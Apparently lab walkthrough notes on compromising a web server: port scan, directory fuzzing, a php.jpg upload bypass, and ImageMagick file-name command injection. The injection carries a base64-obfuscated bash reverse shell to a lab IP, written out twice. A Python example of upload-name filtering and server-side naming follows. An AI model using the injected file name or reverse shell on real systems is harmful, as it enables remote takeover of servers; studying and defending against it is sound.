Open WDavid404 opened 1 month ago
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
80/tcp: ffuf -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -t 100 -u http://192.168.214.178/FUZZ -mc 200 --> no info
Try uploading a PHP file -->
Change php to php.jpg -->
ImageMagick 6.9.6 exploit info
-->
E.g. cp smile.gif '|smile"cat test.txt > leak.txt".gif'
---->
cp image.jpg '|smile"
echo ".jpg'
https://www.revshells.com/
-->
cp image.jpg '|smile"echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjE4Mi80NDQ0IDA+JjE=|base64 -d|bash".jpg'
After uploading the file, we got a reverse shell.
linpeas
Key points:
cp image.jpg '|smile"echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjE4Mi80NDQ0IDA+JjE=|base64 -d|bash".jpg'
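The defensive side of the two upload tricks in these notes (the php.jpg rename and the '|smile"..." file name), as an added example that is not part of the original notes: the upload handler logs suspicious client file names and derives the on-disk name from the file content only, so the client-supplied name never reaches the image converter. The function names, the allow-list pattern and the sample inputs are assumptions constructed for illustration.

```python
import re
import secrets

# Magic-byte signatures for the only formats this hypothetical upload endpoint accepts.
MAGIC = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

# Conservative allow-list: one base name, one extension, no shell or path characters.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_-]{0,63}\.(jpg|jpeg|png|gif)", re.IGNORECASE)


def name_findings(client_name):
    """Return the reasons a client-supplied file name should be logged as suspicious."""
    findings = []
    if client_name.lstrip().startswith("|"):
        findings.append("leading pipe, as in the file names in these notes")
    if re.search(r"[|`$;&<>\"'\\/\x00-\x1f]", client_name):
        findings.append("shell or path metacharacter")
    if client_name.count(".") > 1:
        findings.append("multiple extensions")
    if not SAFE_NAME.fullmatch(client_name):
        findings.append("not in allow-list pattern")
    return findings


def storage_name(data):
    """Choose the on-disk name from the file content only; None means reject the upload."""
    for magic, ext in MAGIC.items():
        if data.startswith(magic):
            # Random server-side name: nothing the client typed survives into the path.
            return f"{secrets.token_hex(16)}.{ext}"
    return None
```

Only the value returned by `storage_name` should be handed to the image-processing step; `name_findings` is for logging and alerting, not for deciding what name to store.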